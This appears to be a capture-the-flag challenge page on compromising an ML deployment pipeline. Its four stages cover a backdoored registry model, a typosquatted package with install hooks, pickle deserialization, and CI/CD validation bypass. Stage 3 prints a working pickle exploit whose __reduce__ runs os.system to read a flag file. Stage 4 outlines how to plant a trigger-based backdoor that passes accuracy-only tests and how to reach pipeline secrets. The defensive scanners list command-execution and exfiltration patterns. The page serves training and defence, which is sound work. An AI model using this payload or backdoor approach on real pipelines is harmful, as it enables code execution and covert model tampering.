CTF: Supply Chain Saboteur
Identify and exploit supply chain vulnerabilities in a model deployment pipeline. Find poisoned models, exploit malicious packages, and compromise the ML infrastructure.
Challenge Briefing
HelixCorp is deploying a new ML model pipeline. Your objective is to compromise this pipeline at multiple points in the supply chain -- from model training data through deployment to production. Each stage of the pipeline has vulnerabilities that mirror real-world supply chain attacks documented in industry incident reports.
Pipeline Architecture
┌─────────────┐ ┌──────────────┐ ┌───────────────┐ ┌──────────────┐
│ Model Hub │───▶│ Training │───▶│ Model │───▶│ Production │
│ (Registry) │ │ Pipeline │ │ Registry │ │ Deployment │
│ │ │ │ │ (Internal) │ │ │
│ Stage 1 │ │ Stage 2 │ │ Stage 3 │ │ Stage 4 │
└─────────────┘ └──────────────┘ └───────────────┘ └──────────────┘
Objectives and Scoring
| Stage | Objective | Points |
|---|---|---|
| Stage 1 | Identify a poisoned model on the public registry | 150 |
| Stage 2 | Exploit a malicious dependency in the training pipeline | 200 |
| Stage 3 | Achieve code execution via insecure model deserialization | 250 |
| Stage 4 | Compromise the production deployment through the CI/CD pipeline | 300 |
| Bonus | Document a complete attack chain from registry to production | +200 |
| Bonus | Detect and report all vulnerabilities without exploitation | +100 |
Maximum possible score: 1,200 points
Stage 1: Poisoned Model Detection
Scenario
HelixCorp downloads pre-trained models from a public model hub. One of the models available for download has been subtly poisoned -- it functions normally for most inputs but produces manipulated outputs for specific trigger inputs.
Challenge
Examine the available models and identify which one has been poisoned. Determine the trigger pattern and the nature of the poisoned behavior.
Model Inventory
List all models available for the target task on the registry. Note their upload dates, authors, download counts, and any quality metrics.
Provenance Analysis
Check the provenance of each model. Who uploaded it? Is there a verifiable training history? Do the training details match the claimed performance?
Behavioral Testing
Run each candidate model against a diverse test set. Compare outputs between models to identify anomalies. Pay attention to edge cases and unusual input patterns.
Trigger Hunting
If behavioral testing reveals anomalies, systematically search for the trigger pattern. Test with variations of the suspicious inputs to map the trigger's boundaries.
import hashlib
import json
import numpy as np
from pathlib import Path
def check_model_provenance(model_card: dict) -> list[str]:
"""Check a model card for supply chain risk indicators."""
warnings = []
# Check author verification
if not model_card.get("author_verified", False):
warnings.append("WARN: Author identity not verified")
# Check training data documentation
if "training_data" not in model_card:
warnings.append("WARN: No training data documentation")
# Check for suspiciously recent upload with high download count
upload_age_days = model_card.get("age_days", 0)
downloads = model_card.get("downloads", 0)
if upload_age_days < 30 and downloads > 10000:
warnings.append(
f"WARN: {downloads} downloads in {upload_age_days} days "
"-- potential artificial inflation"
)
# Check model hash against known-good registry
if model_card.get("sha256") not in KNOWN_GOOD_HASHES:
warnings.append("WARN: Model hash not in known-good registry")
return warnings
def detect_backdoor_behavior(
model,
clean_inputs: list,
trigger_candidates: list,
threshold: float = 0.15,
) -> dict:
"""
Compare model behavior on clean vs. potentially triggered inputs.
A large divergence suggests backdoor behavior.
"""
clean_outputs = [model.predict(x) for x in clean_inputs]
results = {}
for trigger in trigger_candidates:
triggered_inputs = [inject_trigger(x, trigger) for x in clean_inputs]
triggered_outputs = [model.predict(x) for x in triggered_inputs]
# Measure behavioral divergence
divergence = compute_output_divergence(clean_outputs, triggered_outputs)
if divergence > threshold:
results[trigger] = {
"divergence": divergence,
"affected_samples": sum(
1 for c, t in zip(clean_outputs, triggered_outputs)
if c != t
),
}
return resultsHints
| Hint | Cost | Content |
|---|---|---|
| Hint 1 | -22 pts | Check model upload dates -- the poisoned model was uploaded recently |
| Hint 2 | -37 pts | The trigger is a specific phrase embedded in the input text |
Stage 2: Malicious Dependency Exploitation
Scenario
The training pipeline uses a requirements.txt that pulls packages from PyPI. One of the dependencies has been typosquatted -- it has a name very similar to a legitimate package but contains malicious code that executes during installation.
Challenge
Identify the malicious dependency, analyze what it does, and demonstrate exploitation.
Dependency Audit
Review the requirements file and compare each package name against the canonical PyPI registry. Look for misspellings, character substitutions, and namespace confusion.
Package Analysis
Download the suspicious package and inspect its setup.py, init.py, and any post-install hooks. Malicious packages often execute code during pip install.
Payload Analysis
Determine what the malicious code does. Common payloads include: reverse shells, credential theft, environment variable exfiltration, or training data manipulation.
import difflib
from typing import Optional
# Known legitimate packages for ML pipelines
LEGITIMATE_PACKAGES = {
"torch", "torchvision", "transformers", "datasets",
"numpy", "scipy", "pandas", "scikit-learn",
"tokenizers", "accelerate", "safetensors",
"huggingface-hub", "evaluate", "peft",
}
def find_typosquats(
requirements: list[str],
known_packages: set[str] = LEGITIMATE_PACKAGES,
threshold: float = 0.85,
) -> list[dict]:
"""
Identify potential typosquatting in a requirements list.
Returns packages that are suspiciously similar to known packages.
"""
suspicious = []
for req in requirements:
pkg_name = req.split("==")[0].split(">=")[0].strip().lower()
if pkg_name in known_packages:
continue
# Check similarity against known packages
for legit in known_packages:
ratio = difflib.SequenceMatcher(None, pkg_name, legit).ratio()
if ratio >= threshold and pkg_name != legit:
suspicious.append({
"package": pkg_name,
"similar_to": legit,
"similarity": ratio,
"warning": f"Possible typosquat of '{legit}'",
})
return suspicious
def analyze_setup_py(setup_content: str) -> list[str]:
"""Check setup.py for suspicious patterns."""
red_flags = []
suspicious_patterns = [
("subprocess", "Executes system commands"),
("os.system", "Executes system commands"),
("socket", "Network communication"),
("requests.post", "Sends data to external server"),
("base64.b64decode", "Decoded obfuscated payload"),
("exec(", "Dynamic code execution"),
("eval(", "Dynamic code evaluation"),
("__import__", "Dynamic module import"),
]
for pattern, description in suspicious_patterns:
if pattern in setup_content:
red_flags.append(f"RED FLAG: {description} ({pattern})")
return red_flagsHints
| Hint | Cost | Content |
|---|---|---|
| Hint 1 | -30 pts | One package name differs from its legitimate counterpart by a single character |
| Hint 2 | -50 pts | Check the setup.py of each unfamiliar package for post-install hooks |
Stage 3: Insecure Deserialization
Scenario
HelixCorp's internal model registry stores models in Python's pickle format. A model artifact in the registry contains a payload that executes arbitrary code when deserialized.
Challenge
Craft a malicious model file that, when loaded by the deployment pipeline, executes a payload to extract the flag from the production environment.
import pickle
import os
class MaliciousModel:
"""
A class that executes arbitrary code when unpickled.
Demonstrates why pickle should never be used for
untrusted model files.
"""
def __reduce__(self):
# This method is called during deserialization
# It can execute arbitrary code
return (
os.system,
("cat /flag.txt > /tmp/exfiltrated.txt",)
)
def create_poisoned_model(output_path: str = "model.pkl"):
"""Create a model file that executes code on load."""
payload = MaliciousModel()
with open(output_path, "wb") as f:
pickle.dump(payload, f)
print(f"Poisoned model written to {output_path}")
def demonstrate_safe_alternative():
"""Show the safe alternative using safetensors."""
from safetensors.torch import save_file, load_file
import torch
# Safetensors only stores tensor data, no code execution
tensors = {"weight": torch.randn(10, 10)}
save_file(tensors, "model.safetensors")
loaded = load_file("model.safetensors") # Safe -- no code runsFor a deeper treatment of pickle-based exploits, see pickle exploits.
Hints
| Hint | Cost | Content |
|---|---|---|
| Hint 1 | -37 pts | The pipeline calls torch.load() without setting weights_only=True |
| Hint 2 | -62 pts | Use reduce to inject a system command into the pickle payload |
Stage 4: CI/CD Pipeline Compromise
Scenario
The final stage targets the CI/CD pipeline that deploys models to production. The pipeline pulls models from the internal registry, runs validation tests, and deploys to the production endpoint. There is a vulnerability in the validation step.
Challenge
Exploit the CI/CD pipeline to deploy a model that contains a backdoor, bypassing the validation tests.
Approach
- Analyze the CI/CD configuration for injection points
- Identify what the validation tests check and what they miss
- Craft a model that passes validation but contains a backdoor for specific trigger inputs
- Exploit any secrets or credentials accessible from within the CI/CD environment
Hints
| Hint | Cost | Content |
|---|---|---|
| Hint 1 | -45 pts | The validation tests only check accuracy on a fixed test set |
| Hint 2 | -75 pts | A backdoored model that performs normally on the test set but has a trigger will pass validation |
Related Challenges
- Agent Heist -- agent-level exploitation
- RAG Infiltrator -- data pipeline poisoning
- Model Supply Chain -- theoretical foundations
Related Topics
- Fine-Tune Backdoor - Backdoor injection through fine-tuning that complements supply chain attacks
- Federated Poisoning - Distributed training poisoning in the broader supply chain surface
- Training Data Extraction - Training pipeline attacks related to supply chain compromise
- Model Supply Chain - Theoretical foundations for model supply chain security
References
- "Poisoning Language Models During Instruction Tuning" - Wan et al. (2023) - Research on backdoor injection through training data poisoning
- "BadNets: Identifying Vulnerabilities in the Machine Learning Model Supply Chain" - Gu et al. (2019) - Foundational research on ML supply chain backdoor attacks
- "OWASP Top 10 for LLM Applications: Supply Chain Vulnerabilities" - OWASP (2025) - Industry guidance on ML supply chain security
- "Spinning Sequence-to-Sequence Models with Meta-Backdoors" - Bagdasaryan & Shmatikov (2022) - Advanced supply chain backdoor techniques for sequence models
Why is Python's pickle format a security risk for model serialization?
What makes typosquatting attacks particularly effective against ML teams?